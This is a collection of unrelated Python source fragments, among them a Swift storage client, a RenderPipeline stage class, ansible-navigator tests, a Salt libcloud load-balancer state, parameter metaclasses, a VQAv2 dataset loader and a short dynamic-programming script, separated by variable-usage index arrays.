os.makedirs(dirname)
with open(file_name, 'wb') as out:
data_stream = self.get_object(bucket, key, stream=True)
shutil.copyfileobj(data_stream, out)
except Exception as e:
logging.error(e)
return False
return True
def head_object(self, container_name, key):
"""
Head object from Swift with a key. Throws StorageNoSuchKeyError if the given key does not exist.
:param key: key of the object
:return: Data of the object
:rtype: str/bytes
"""
url = '/'.join([self.endpoint, container_name, key])
try:
res = self.session.head(url)
if res.status_code == 200:
return res.headers
elif res.status_code == 404:
raise StorageNoSuchKeyError(container_name, key)
else:
raise Exception('{} - {}'.format(res.status_code, key))
except Exception as e:
raise StorageNoSuchKeyError(container_name, key)
def delete_object(self, container_name, key):
"""
Delete an object from Swift.
:param bucket: bucket name
:param key: data key
"""
url = '/'.join([self.endpoint, container_name, key])
return self.session.delete(url)
def delete_objects(self, container_name, key_list):
"""
Delete a list of objects from Swift.
:param bucket: bucket name
:param key: data key
"""
headers={'X-Auth-Token': self.token,
'X-Bulk-Delete': 'True'}
keys_to_delete = []
for key in key_list:
keys_to_delete.append('/{}/{}'.format(container_name, key))
keys_to_delete = '\n'.join(keys_to_delete)
url = '/'.join([self.endpoint, '?bulk-delete'])
return self.session.delete(url, data=keys_to_delete, headers=headers)
def list_objects(self, container_name, prefix=''):
"""
Lists the objects in a bucket. Throws StorageNoSuchKeyError if the given bucket does not exist.
:param key: key of the object
:return: Data of the object
:rtype: str/bytes
"""
if prefix:
url = '/'.join([self.endpoint, container_name, '?format=json&prefix='+prefix])
else:
url = '/'.join([self.endpoint, container_name, '?format=json'])
try:
res = self.session.get(url)
objects = res.json()
# TODO: Adapt to Key and Size
return objects
except Exception as e:
raise e
def list_keys(self, container_name, prefix):
"""
Return a list of keys for the given prefix.
:param prefix: Prefix to filter object names.
:return: List of keys in bucket that match the given prefix.
:rtype: list of str
"""
try:
objects = self.list_objects(container_name, prefix)
object_keys = [r['name'] for r in objects]
return object_keys
except Exception as e:
raise(e)
| [
[
[
589,
591
],
[
5786,
5788
],
[
6574,
6576
],
[
6632,
6634
],
[
6673,
6675
]
],
[
[
599,
603
],
[
2518,
2522
],
[
2661,
2665
],
[
3241,
3245
]
],
[
[
611,
617
],
[
6829,
6835
]
],
[
[
625,
632
],
[
798,
805
],
[
6002,
6009
],
[
6909,
6916
]
],
[
[
640,
648
],
[
1634,
1642
],
[
1737,
1745
],
[
2548,
2556
]
],
[
[
683,
704
],
[
5021,
5042
],
[
5169,
5190
],
[
5210,
5231
],
[
5323,
5344
],
[
7501,
7522
],
[
7683,
7704
]
],
[
[
731,
741
],
[
3933,
3943
]
],
[
[
772,
787
],
[
1909,
1924
]
],
[
[
789,
795
],
[
956,
962
],
[
1959,
1965
],
[
3876,
3882
],
[
4011,
4017
]
],
[
[
834,
848
]
]
] |
"""
RenderPipeline
Copyright (c) 2014-2016 tobspr <tobias.springer1@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from rpcore.render_target import RenderTarget
from rpcore.loader import RPLoader
class RenderStage():
""" This class is the abstract class for all stages used in the pipeline.
It represents a part of the pipeline render process. Each stage specifies
which pipes it uses and which pipes it produces. A pipe can be seen as a
texture, which gets modified. E.g. the gbuffer pass produces the gbuffer
pipe, the ambient occlusion pass produces the occlusion pipe and so on. The
lighting pass can then specify which pipes it needs and compute the image.
Using a pipe system ensures that new techniques can be inserted easily,
without the other techniques even being aware of them """
required_inputs = []
required_pipes = []
produced_inputs = {}
produced_pipes = {}
produced_defines = {}
disabled = False
def __init__(self, pipeline):
""" Creates a new render stage """
self.stage_id = self.__class__.__name__
self._pipeline = pipeline
self._active = True
self._targets = {}
def create(self):
""" This method should setup the stage and create the pipes """
raise NotImplementedError()
def reload_shaders(self):
""" This method should set all required shaders, there should be no
shaders set in the create method, because the shader auto config is not
generated there """
pass
def set_shader_input(self, *args):
""" This method sets a shader input on all stages, which is mainly used
by the stage manager """
for target in self._targets.values():
target.set_shader_input(*args)
def set_shader_inputs(self, **kwargs):
""" This method sets shader inputs on all stages, which is mainly used
by the stage manager """
for target in self._targets.values():
target.set_shader_inputs(**kwargs)
def update(self):
""" This method gets called every frame, and can be overridden by render
stages to perform custom updates """
pass
@property
def active(self):
""" Returns whether *all* targets of the stage are active """
return self._active
@active.setter
def active(self, state):
""" Enables or disables this stage. In case the stage is disabled, it will
not get updated anymore, and all stages are distabled """
if self._active != state:
self._active = state
for target in self._targets.values():
target.active = self._active
def create_target(self, name):
""" Creates a new render target and binds it to this stage """
# Format the name like Plugin:Stage:Name, so it can be easily
# found in pstats below the plugin cagetory
name = self._get_plugin_id() + ":" + self.stage_id + ":" + name
if name in self._targets:
return self.error("Overriding existing target: " + name)
self._targets[name] = RenderTarget(name)
return self._targets[name]
def remove_target(self, target):
""" Removes a previously registered target. This unregisters the
target, as well as removing it from the list of assigned targets. """
target.remove()
target_key = None
for key, value_target in self._targets.items():
if target == value_target:
target_key = key
break
del self._targets[target_key]
def _get_shader_handle(self, path, *args):
""" Returns a handle to a Shader object, containing all sources passed
as arguments. The path argument will be used to locate shaders if no
absolute path is given. This is the internal method used in load_shader
and load_plugin_shader. """
assert len(args) > 0 and len(args) <= 3
path_args = []
for source in args:
for prefix in ("/$$rpconfig", "/$$rp/shader", "/$$rptemp"):
if prefix in source:
path_args.append(source)
break
else:
path_args.append(path.format(source))
# If only one shader is specified, assume its a postprocess fragment shader,
# and use the default vertex shader
if len(args) == 1:
path_args = ["/$$rp/shader/default_post_process.vert.glsl"] + path_args
return RPLoader.load_shader(*path_args)
def _get_plugin_id(self):
""" Returns the id of the plugin which created this stage. This is done
by extracting the name of the plugin from the module name """
if "rpcore.stages" in self.__class__.__module__:
return "render_pipeline_internal"
return str(self.__class__.__module__).split(".")[-2]
def load_shader(self, *args):
""" Loads a shader from the given args. If only one argument is passed,
the default template for the stage is loaded. If two arguments are
passed, the first argument should be the vertex shader and the second
argument should be the fragment shader. If three arguments are passed,
the order should be vertex, fragment, geometry """
return self._get_shader_handle("/$$rp/shader/{0}", *args)
def load_plugin_shader(self, *args):
""" Loads a shader from the plugin directory. This method is useful
for RenderStages created by plugins. For a description of the arguments,
see the load_shader function. """
shader_path = "rpplugins/" + self._get_plugin_id() + "/shader/{0}"
return self._get_shader_handle(shader_path, *args)
def handle_window_resize(self):
""" This method gets called when the window gets resized. By default,
this just resizes all render targets. """
self.set_dimensions()
for target in self._targets.values():
target.consider_resize()
def set_dimensions(self):
""" This method should set the dimensions on all targets which don't
have a relative constraint, and also the size of all images. This
is called after initialization, and when the window resized. """
pass
| [
[
[
1144,
1156
],
[
4127,
4139
]
],
[
[
1183,
1191
],
[
5536,
5544
]
],
[
[
1200,
1211
]
]
] |
"""Base class for inventory interactive/stdout tests.
"""
import difflib
import json
import os
import pytest
from ....defaults import FIXTURES_DIR
from ..._common import fixture_path_from_request
from ..._common import update_fixtures
from ..._interactions import SearchFor
from ..._interactions import Step
from ..._tmux_session import TmuxSession
TEST_FIXTURE_DIR = os.path.join(FIXTURES_DIR, "integration", "actions", "inventory")
ANSIBLE_INVENTORY_FIXTURE_DIR = os.path.join(TEST_FIXTURE_DIR, "ansible_inventory", "inventory.yml")
TEST_CONFIG_FILE = os.path.join(TEST_FIXTURE_DIR, "ansible-navigator.yml")
base_steps = (
Step(user_input=":0", comment="Browse hosts/ungrouped window"),
Step(user_input=":0", comment="Group list window"),
Step(user_input=":0", comment="group01 hosts detail window"),
Step(user_input=":0", comment="host0101 detail window"),
Step(user_input=":back", comment="Previous window (group01 hosts detail window)"),
Step(user_input=":back", comment="Previous window (Group list window)"),
Step(user_input=":1", comment="group02 hosts detail window"),
Step(user_input=":0", comment="host0201 detail window"),
Step(user_input=":back", comment="Previous window (group02 hosts detail window)"),
Step(user_input=":back", comment="Previous window (Group list window)"),
Step(user_input=":2", comment="group03 hosts detail window"),
Step(user_input=":0", comment="host0301 detail window"),
Step(user_input=":back", comment="Previous window (group03 hosts detail window)"),
Step(user_input=":back", comment="Previous window (Group list window)"),
Step(user_input=":back", comment="Previous window (Browse hosts/ungrouped window)"),
Step(user_input=":back", comment="Previous window (top window)"),
Step(user_input=":1", comment="Inventory hostname window"),
Step(user_input=":0", comment="host0101 detail window"),
Step(user_input=":back", comment="Previous window after host0101 (Inventory hostname window)"),
Step(user_input=":1", comment="host0201 detail window"),
Step(user_input=":back", comment="Previous window after host0201 (Inventory hostname window)"),
Step(user_input=":2", comment="host0301 detail window"),
)
class BaseClass:
"""base class for inventory interactive/stdout tests"""
UPDATE_FIXTURES = False
@staticmethod
@pytest.fixture(scope="module", name="tmux_session")
def fixture_tmux_session(request):
"""tmux fixture for this module"""
params = {
"setup_commands": [
"export ANSIBLE_DEVEL_WARNING=False",
"export ANSIBLE_DEPRECATION_WARNINGS=False",
],
"pane_height": "2000",
"pane_width": "500",
"config_path": TEST_CONFIG_FILE,
"unique_test_id": request.node.nodeid,
}
with TmuxSession(**params) as tmux_session:
yield tmux_session
def test(self, request, tmux_session, step):
"""Run the tests for inventory, mode and ``ee`` set in child class."""
assert os.path.exists(ANSIBLE_INVENTORY_FIXTURE_DIR)
assert os.path.exists(TEST_CONFIG_FILE)
if step.search_within_response is SearchFor.HELP:
search_within_response = ":help help"
elif step.search_within_response is SearchFor.PROMPT:
search_within_response = tmux_session.cli_prompt
else:
raise ValueError("test mode not set")
received_output = tmux_session.interaction(
value=step.user_input,
search_within_response=search_within_response,
)
if step.mask:
# mask out some configuration that is subject to change each run
mask = "X" * 50
for idx, line in enumerate(received_output):
if tmux_session.cli_prompt in line:
received_output[idx] = mask
fixtures_update_requested = (
self.UPDATE_FIXTURES
or os.environ.get("ANSIBLE_NAVIGATOR_UPDATE_TEST_FIXTURES") == "true"
and not any((step.look_fors, step.look_nots))
)
if fixtures_update_requested:
update_fixtures(
request,
step.step_index,
received_output,
step.comment,
additional_information={
"look_fors": step.look_fors,
"look_nots": step.look_nots,
"compared_fixture": not any((step.look_fors, step.look_nots)),
},
)
page = " ".join(received_output)
if step.look_fors:
assert all(look_for in page for look_for in step.look_fors)
if step.look_nots:
assert not any(look_not in page for look_not in step.look_nots)
if not any((step.look_fors, step.look_nots)):
dir_path, file_name = fixture_path_from_request(request, step.step_index)
with open(file=os.path.join(dir_path, file_name), encoding="utf-8") as infile:
expected_output = json.load(infile)["output"]
assert expected_output == received_output, "\n" + "\n".join(
difflib.unified_diff(expected_output, received_output, "expected", "received"),
)
| [
[
[
65,
72
],
[
5210,
5217
]
],
[
[
80,
84
],
[
5092,
5096
]
],
[
[
92,
94
],
[
372,
374
],
[
470,
472
],
[
558,
560
],
[
3085,
3087
],
[
3146,
3148
],
[
4003,
4005
],
[
4994,
4996
]
],
[
[
103,
109
],
[
2368,
2374
]
],
[
[
136,
148
],
[
385,
397
]
],
[
[
172,
197
],
[
4915,
4940
]
],
[
[
221,
236
],
[
4188,
4203
]
],
[
[
266,
275
],
[
3222,
3231
],
[
3332,
3341
]
],
[
[
305,
309
],
[
635,
639
],
[
703,
707
],
[
759,
763
],
[
825,
829
],
[
886,
890
],
[
973,
977
],
[
1050,
1054
],
[
1116,
1120
],
[
1177,
1181
],
[
1264,
1268
],
[
1341,
1345
],
[
1407,
1411
],
[
1468,
1472
],
[
1555,
1559
],
[
1632,
1636
],
[
1721,
1725
],
[
1791,
1795
],
[
1855,
1859
],
[
1916,
1920
],
[
2016,
2020
],
[
2077,
2081
],
[
2177,
2181
]
],
[
[
339,
350
],
[
2871,
2882
]
],
[
[
353,
369
],
[
483,
499
],
[
571,
587
]
],
[
[
438,
467
],
[
3100,
3129
]
],
[
[
539,
555
],
[
2778,
2794
],
[
3161,
3177
]
],
[
[
616,
626
]
],
[
[
2244,
2253
]
]
] |
# -*- coding: utf-8 -*-
'''
Apache Libcloud Load Balancer State
===================================
Manage load balancers using libcloud
:codeauthor: ``Anthony Shaw <anthonyshaw@apache.org>``
Apache Libcloud load balancer management for a full list
of supported clouds, see http://libcloud.readthedocs.io/en/latest/loadbalancer/supported_providers.html
Clouds include Amazon ELB, ALB, Google, Aliyun, CloudStack, Softlayer
.. versionadded:: 2018.3.0
:configuration:
This module uses a configuration profile for one or multiple Cloud providers
.. code-block:: yaml
libcloud_loadbalancer:
profile_test1:
driver: gce
key: GOOG0123456789ABCXYZ
secret: mysecret
profile_test2:
driver: alb
key: 12345
secret: mysecret
Example:
Using States to deploy a load balancer with extended arguments to specify region
.. code-block:: yaml
lb_test:
libcloud_loadbalancer.balancer_present:
- name: example
- port: 80
- protocol: http
- profile: google
- ex_region: us-east1
:depends: apache-libcloud
'''
# Import Python Libs
from __future__ import absolute_import, unicode_literals, print_function
import logging
# Import salt libs
import salt.utils.compat
log = logging.getLogger(__name__)
def __virtual__():
return True
def __init__(opts):
salt.utils.compat.pack_dunder(__name__)
def state_result(result, message, name, changes=None):
if changes is None:
changes = {}
return {'result': result,
'comment': message,
'name': name,
'changes': changes}
def balancer_present(name, port, protocol, profile, algorithm=None, members=None, **libcloud_kwargs):
'''
Ensures a load balancer is present.
:param name: Load Balancer name
:type name: ``str``
:param port: Port the load balancer should listen on, defaults to 80
:type port: ``str``
:param protocol: Loadbalancer protocol, defaults to http.
:type protocol: ``str``
:param profile: The profile key
:type profile: ``str``
:param algorithm: Load balancing algorithm, defaults to ROUND_ROBIN. See Algorithm type
in Libcloud documentation for a full listing.
:type algorithm: ``str``
:param members: An optional list of members to create on deployment
:type members: ``list`` of ``dict`` (ip, port)
'''
balancers = __salt__['libcloud_loadbalancer.list_balancers'](profile)
match = [z for z in balancers if z['name'] == name]
if len(match) > 0:
return state_result(True, "Balancer already exists", name)
else:
starting_members = None
if members is not None:
starting_members = []
for m in members:
starting_members.append({'ip': m['ip'], 'port': m['port']})
balancer = __salt__['libcloud_loadbalancer.create_balancer'](
name, port, protocol,
profile, algorithm=algorithm,
members=starting_members,
**libcloud_kwargs)
return state_result(True, "Created new load balancer", name, balancer)
def balancer_absent(name, profile, **libcloud_kwargs):
'''
Ensures a load balancer is absent.
:param name: Load Balancer name
:type name: ``str``
:param profile: The profile key
:type profile: ``str``
'''
balancers = __salt__['libcloud_loadbalancer.list_balancers'](profile)
match = [z for z in balancers if z['name'] == name]
if len(match) == 0:
return state_result(True, "Balancer already absent", name)
else:
result = __salt__['libcloud_loadbalancer.destroy_balancer'](match[0]['id'], profile, **libcloud_kwargs)
return state_result(result, "Deleted load balancer", name)
def member_present(ip, port, balancer_id, profile, **libcloud_kwargs):
'''
Ensure a load balancer member is present
:param ip: IP address for the new member
:type ip: ``str``
:param port: Port for the new member
:type port: ``int``
:param balancer_id: id of a load balancer you want to attach the member to
:type balancer_id: ``str``
:param profile: The profile key
:type profile: ``str``
'''
existing_members = __salt__['libcloud_loadbalancer.list_balancer_members'](balancer_id, profile)
for member in existing_members:
if member['ip'] == ip and member['port'] == port:
return state_result(True, "Member already present", balancer_id)
member = __salt__['libcloud_loadbalancer.balancer_attach_member'](balancer_id, ip, port, profile, **libcloud_kwargs)
return state_result(True, "Member added to balancer, id: {0}".format(member['id']), balancer_id, member)
def member_absent(ip, port, balancer_id, profile, **libcloud_kwargs):
'''
Ensure a load balancer member is absent, based on IP and Port
:param ip: IP address for the member
:type ip: ``str``
:param port: Port for the member
:type port: ``int``
:param balancer_id: id of a load balancer you want to detach the member from
:type balancer_id: ``str``
:param profile: The profile key
:type profile: ``str``
'''
existing_members = __salt__['libcloud_loadbalancer.list_balancer_members'](balancer_id, profile)
for member in existing_members:
if member['ip'] == ip and member['port'] == port:
result = __salt__['libcloud_loadbalancer.balancer_detach_member'](balancer_id, member['id'], profile, **libcloud_kwargs)
return state_result(result, "Member removed", balancer_id)
return state_result(True, "Member already absent", balancer_id)
| [
[
[
1244,
1259
]
],
[
[
1261,
1277
]
],
[
[
1279,
1293
]
],
[
[
1301,
1308
],
[
1361,
1368
]
],
[
[
1336,
1353
],
[
1452,
1456
]
],
[
[
1355,
1358
]
],
[
[
1395,
1406
]
],
[
[
1432,
1440
]
],
[
[
1498,
1510
],
[
2661,
2673
],
[
3157,
3169
],
[
3629,
3641
],
[
3818,
3830
],
[
4531,
4543
],
[
4721,
4733
],
[
5627,
5639
],
[
5690,
5702
]
],
[
[
1720,
1736
]
],
[
[
3227,
3242
]
],
[
[
3876,
3890
]
],
[
[
4825,
4838
]
]
] |
import pathlib
from silex_client.utils.log import logger
class AnyParameter(object):
def __new__(cls, value):
return value
class CommandParameterMeta(type):
def __new__(cls, name: str, bases: tuple, dct: dict):
def serialize():
return {
"name": "parameter",
}
attributes = {
"serialize": serialize,
}
attributes.update(dct)
return super().__new__(cls, name, bases, attributes)
def get_default(self):
return None
def serialize(self):
return None
class TaskParameterMeta(CommandParameterMeta):
def __init__(self):
pass
def __new__(cls):
def serialize():
return {
"name": "task",
}
def get_default():
return ""
attributes = {
"serialize": serialize,
"get_default": get_default,
}
return super().__new__(cls, "TaskParameter", (str,), attributes)
class IntArrayParameterMeta(CommandParameterMeta):
def __init__(self, size: int):
pass
def __new__(cls, size: int):
def __init__(self, value):
if not isinstance(value, list):
value = [value]
for index, item in enumerate(value):
value[index] = int(item)
self.extend(value)
def serialize():
return {
"name": "int_array",
"size": size,
}
def get_default():
return [0 for i in range(size)]
attributes = {
"__init__": __init__,
"serialize": serialize,
"get_default": get_default,
}
return super().__new__(cls, "IntArrayParameter", (list,), attributes)
class RangeParameterMeta(CommandParameterMeta):
def __init__(self, start: int, end: int, increment: int = 1):
pass
def __new__(cls, start: int, end: int, increment: int = 1):
def serialize():
return {
"name": "range",
"start": start,
"end": end,
"increment": increment,
}
def get_default():
return start
attributes = {
"serialize": serialize,
"get_default": get_default,
}
return super().__new__(cls, "RangeParameter", (int,), attributes)
class SelectParameterMeta(CommandParameterMeta):
def __init__(self, *list_options, **options):
pass
def __new__(cls, *list_options, **options):
for unnamed_option in list_options:
options[unnamed_option] = unnamed_option
def serialize():
return {"name": "select", "options": options}
def get_default():
return list(options.values())[0] if options else None
attributes = {
"serialize": serialize,
"get_default": get_default,
}
return super().__new__(cls, "SelectParameter", (str,), attributes)
class RadioSelectParameterMeta(CommandParameterMeta):
def __init__(self, *list_options, **options):
pass
def __new__(cls, *list_options, **options):
for unnamed_option in list_options:
options[unnamed_option] = unnamed_option
def serialize():
return {"name": "radio_select", "options": options}
def get_default():
return list(options.values())[0] if options else None
attributes = {
"serialize": serialize,
"get_default": get_default,
}
return super().__new__(cls, "RadioSelectParameter", (str,), attributes)
class MultipleSelectParameterMeta(CommandParameterMeta):
def __init__(self, *list_options, **options):
pass
def __new__(cls, *list_options, **options):
for unnamed_option in list_options:
options[unnamed_option] = unnamed_option
def serialize():
return {"name": "multiple_select", "options": options}
def get_default():
return [list(options.values())[0]] if options else None
attributes = {
"serialize": serialize,
"get_default": get_default,
}
return super().__new__(cls, "SelectParameter", (list,), attributes)
# TODO: Replace this parameter with ListParameterMeta
class ListParameter(list):
def __init__(self, value):
logger.warning(
"Deprecation warning: The parameter type ListParameter is deprecated in favor if ListParameterMeta()"
)
data = value
if not isinstance(value, list):
data = [value]
self.extend(data)
class PathParameterMeta(CommandParameterMeta):
def __init__(self, extensions=None, multiple=False):
pass
def __new__(cls, extensions=None, multiple=False):
if extensions is None:
extensions = ["*"]
def __init_list__(self, value):
if not isinstance(value, list):
value = [value]
for index, item in enumerate(value):
value[index] = pathlib.Path(item)
self.extend(value)
def serialize():
return {
"name": "Path",
"extensions": extensions,
"multiple": multiple,
}
def get_default():
return None
attributes = {
"serialize": serialize,
"get_default": get_default,
}
if multiple:
attributes["__init__"] = __init_list__
return super().__new__(cls, "PathParameter", (list,), attributes)
return super().__new__(
cls, "PathParameter", (type(pathlib.Path()),), attributes
)
class ListParameterMeta(CommandParameterMeta):
def __init__(self, parameter_type):
pass
def __new__(cls, parameter_type):
def __init__(self, value):
if not isinstance(value, list):
value = [value]
for index, item in enumerate(value):
value[index] = parameter_type(item)
self.extend(value)
def serialize():
item_type = None
if isinstance(parameter_type, CommandParameterMeta):
return parameter_type.serialize()
elif isinstance(parameter_type, type):
item_type = {"name": parameter_type.__name__}
return {"name": "list", "itemtype": item_type}
def get_default():
return []
attributes = {
"__init__": __init__,
"serialize": serialize,
"get_default": get_default,
}
return super().__new__(cls, "ListParameter", (list,), attributes)
class TextParameterMeta(CommandParameterMeta):
def __init__(self, color=None):
pass
def __new__(cls, color=None):
def serialize():
return {"name": "text", "color": color}
def get_default():
return ""
attributes = {
"serialize": serialize,
"get_default": get_default,
}
return super().__new__(cls, "ListParameter", (str,), attributes)
| [
[
[
7,
14
],
[
5761,
5768
],
[
5151,
5158
]
],
[
[
51,
57
],
[
4461,
4467
]
],
[
[
66,
78
]
],
[
[
146,
166
],
[
611,
631
],
[
1049,
1069
],
[
1837,
1857
],
[
2462,
2482
],
[
3090,
3110
],
[
3732,
3752
],
[
4742,
4762
],
[
5827,
5847
],
[
6827,
6847
],
[
6285,
6305
]
],
[
[
593,
610
]
],
[
[
1027,
1048
]
],
[
[
1818,
1836
]
],
[
[
2442,
2461
]
],
[
[
3065,
3089
]
],
[
[
3704,
3731
]
],
[
[
4401,
4414
]
],
[
[
4724,
4741
]
],
[
[
5809,
5826
]
],
[
[
6809,
6826
]
]
] |
N = input()
L = len(N)
K = int(input())
dp = [[[0] * 2 for _ in range(K + 1)] for _ in range(L + 1)]
dp[0][0][1] = 1
for i, x in zip(range(L), map(int, N)):
for k in range(K):
dp[i+1][k][0] += dp[i][k][0] # d == 0
if x == 0:
dp[i+1][k][1] += dp[i][k][1]
elif x > 0:
dp[i+1][k][0] += dp[i][k][1]
# d != 0
for d in range(1, 10):
dp[i+1][k+1][0] += dp[i][k][0]
if d == x:
dp[i+1][k+1][1] += dp[i][k][1]
elif d < x:
dp[i+1][k+1][0] += dp[i][k][1]
dp[i+1][K][0] += dp[i][K][0] # k == K and d == 0
if x == 0:
dp[i+1][K][1] += dp[i][K][1]
elif x > 0:
dp[i+1][K][0] += dp[i][K][1]
print(sum(dp[-1][K]))
| [
[
[
0,
1
],
[
20,
21
],
[
152,
153
]
],
[
[
12,
13
],
[
93,
94
],
[
139,
140
]
],
[
[
23,
24
],
[
70,
71
],
[
176,
177
],
[
607,
608
],
[
592,
593
],
[
680,
681
],
[
665,
666
],
[
733,
734
],
[
718,
719
],
[
756,
757
]
],
[
[
40,
42
],
[
101,
103
],
[
205,
207
],
[
188,
190
],
[
275,
277
],
[
258,
260
],
[
336,
338
],
[
319,
321
],
[
427,
429
],
[
408,
410
],
[
497,
499
],
[
478,
480
],
[
568,
570
],
[
549,
551
],
[
601,
603
],
[
584,
586
],
[
674,
676
],
[
657,
659
],
[
727,
729
],
[
710,
712
],
[
749,
751
]
],
[
[
121,
122
],
[
208,
209
],
[
191,
192
],
[
278,
279
],
[
261,
262
],
[
339,
340
],
[
322,
323
],
[
430,
431
],
[
411,
412
],
[
500,
501
],
[
481,
482
],
[
571,
572
],
[
552,
553
],
[
604,
605
],
[
587,
588
],
[
677,
678
],
[
660,
661
],
[
730,
731
],
[
713,
714
]
],
[
[
124,
125
],
[
238,
239
],
[
300,
301
],
[
459,
460
],
[
530,
531
],
[
641,
642
],
[
695,
696
]
],
[
[
165,
166
],
[
211,
212
],
[
196,
197
],
[
281,
282
],
[
266,
267
],
[
342,
343
],
[
327,
328
],
[
433,
434
],
[
416,
417
],
[
503,
504
],
[
486,
487
],
[
574,
575
],
[
557,
558
]
],
[
[
377,
378
],
[
454,
455
],
[
526,
527
]
]
] |
config = {
"username": 'slask',
"icon": ":poop:",
}
| [
[
[
0,
6
]
]
] |
# Copyright (c) Aishwarya Kamath & Nicolas Carion. Licensed under the Apache License 2.0. All Rights Reserved
"""
COCO dataset which returns image_id for evaluation.
Mostly copy-paste from https://github.com/ashkamath/mdetr/blob/main/datasets/gqa.py
"""
import json
from pathlib import Path
import torch
import torchvision
from transformers import RobertaTokenizerFast
from .coco import ConvertCocoPolysToMask, ModulatedDetection, make_coco_transforms
class VQAv2Detection(ModulatedDetection):
pass
class VQAv2QuestionAnswering(torchvision.datasets.CocoDetection):
def __init__(self, img_folder, ann_file, transforms, return_masks, return_tokens, tokenizer, ann_folder):
super(VQAv2QuestionAnswering, self).__init__(img_folder, ann_file)
self._transforms = transforms
self.prepare = ConvertCocoPolysToMask(return_masks, return_tokens, tokenizer=tokenizer)
with open(ann_folder / "vqa2_answer2id.json", "r") as f:
self.answer2id = json.load(f)
with open(ann_folder / "vqa2_answer2id_by_type.json", "r") as f:
self.answer2id_by_type = json.load(f)
self.type2id = {"yes/no": 0, "number": 1, "other": 2}
def __getitem__(self, idx):
img, target = super(VQAv2QuestionAnswering, self).__getitem__(idx)
image_id = self.ids[idx]
coco_img = self.coco.loadImgs(image_id)[0]
caption = coco_img["caption"]
dataset_name = coco_img["dataset_name"]
questionId = coco_img["questionId"]
target = {"image_id": image_id, "annotations": target, "caption": caption}
img, target = self.prepare(img, target)
if self._transforms is not None:
img, target = self._transforms(img, target)
target["dataset_name"] = dataset_name
target["questionId"] = questionId
if coco_img["answer"] not in self.answer2id:
answer = "unknown"
else:
answer = coco_img["answer"]
target["answer"] = torch.as_tensor(self.answer2id[answer], dtype=torch.long)
target["answer_type"] = torch.as_tensor(self.type2id[coco_img["answer_type"]], dtype=torch.long)
# util.misc.collate_fn requires to put 'answer' before every type of answer in target
if coco_img["answer"] not in self.answer2id_by_type["yes/no"]:
answer = "unknown"
else:
answer = coco_img["answer"]
target["answer_yes/no"] = torch.as_tensor(
self.answer2id_by_type["yes/no"][answer] if coco_img["answer_type"] == "yes/no" else -100,
dtype=torch.long,
)
if coco_img["answer"] not in self.answer2id_by_type["number"]:
answer = "unknown"
else:
answer = coco_img["answer"]
target["answer_number"] = torch.as_tensor(
self.answer2id_by_type["number"][answer] if coco_img["answer_type"] == "number" else -100,
dtype=torch.long,
)
if coco_img["answer"] not in self.answer2id_by_type["other"]:
answer = "unknown"
else:
answer = coco_img["answer"]
target["answer_other"] = torch.as_tensor(
self.answer2id_by_type["other"][answer] if coco_img["answer_type"] == "other" else -100,
dtype=torch.long,
)
return img, target
def build(image_set, args):
# TODO: img or all?
img_dir = Path(args.coco_img_path)
assert img_dir.exists(), f"provided COCO img path {img_dir} does not exist"
tokenizer = RobertaTokenizerFast.from_pretrained(args.text_encoder_type)
if args.do_qa:
# Для vqa2 это не нужно:
# assert args.vqa2_split_type is not None
if image_set == "train":
datasets = []
for imset in ["train", "minival"]:
ann_file = Path(args.vqa2_ann_path) / f"finetune_vqa2_{imset}.json"
datasets.append(
VQAv2QuestionAnswering(
img_dir / "train2014" if imset == "train" else img_dir / "val2014",
ann_file,
transforms=make_coco_transforms(image_set, cautious=True),
return_masks=args.masks,
return_tokens=True,
tokenizer=tokenizer,
ann_folder=Path(args.vqa2_ann_path),
)
)
return torch.utils.data.ConcatDataset(datasets)
elif image_set == "val":
# TODO: правильный ли ann_file?
ann_file = Path(args.vqa2_ann_path) / f"finetune_vqa2_minival.json"
return VQAv2QuestionAnswering(
img_dir / "val2014",
ann_file,
transforms=make_coco_transforms(image_set, cautious=True),
return_masks=args.masks,
return_tokens=True,
tokenizer=tokenizer,
ann_folder=Path(args.vqa2_ann_path),
)
elif image_set in ["test", "testdev", "trainval"]:
ann_file = Path(args.vqa2_ann_path) / f"finetune_vqa2_{image_set}.json"
return VQAv2QuestionAnswering(
img_dir / "test2015",
ann_file,
transforms=make_coco_transforms("val", cautious=True),
return_masks=args.masks,
return_tokens=True,
tokenizer=tokenizer,
ann_folder=Path(args.vqa2_ann_path),
)
else:
assert False, f"Unknown image set {image_set}"
| [
[
[
262,
266
],
[
987,
991
],
[
1110,
1114
]
],
[
[
287,
291
],
[
3392,
3396
],
[
3812,
3816
],
[
4329,
4333
],
[
4556,
4560
],
[
4936,
4940
],
[
5058,
5062
],
[
5439,
5443
]
],
[
[
300,
305
],
[
1990,
1995
],
[
2036,
2041
],
[
2080,
2085
],
[
2141,
2146
],
[
2438,
2443
],
[
2576,
2581
],
[
2789,
2794
],
[
2927,
2932
],
[
3138,
3143
],
[
3274,
3279
],
[
4415,
4420
]
],
[
[
313,
324
],
[
537,
548
]
],
[
[
350,
370
],
[
3514,
3534
]
],
[
[
390,
412
],
[
820,
842
]
],
[
[
414,
432
],
[
477,
495
]
],
[
[
434,
454
],
[
4108,
4128
],
[
4747,
4767
],
[
5254,
5274
]
],
[
[
462,
476
]
],
[
[
514,
536
],
[
698,
720
],
[
1246,
1268
],
[
3923,
3945
],
[
4633,
4655
],
[
5139,
5161
]
],
[
[
3330,
3335
]
]
] |
from assertpy import assert_that
from httmock import HTTMock
from sahyun_bot.commands.admin import Index, Rank
from sahyun_bot.users_settings import UserRank
from tests.mock_customsforge import customsforge
def test_require_admin(commander, hook):
for command in ['!lock', '!index', '!rank']:
with commander.executest(hook, command, 'goodlikebot'):
hook.assert_silent_failure()
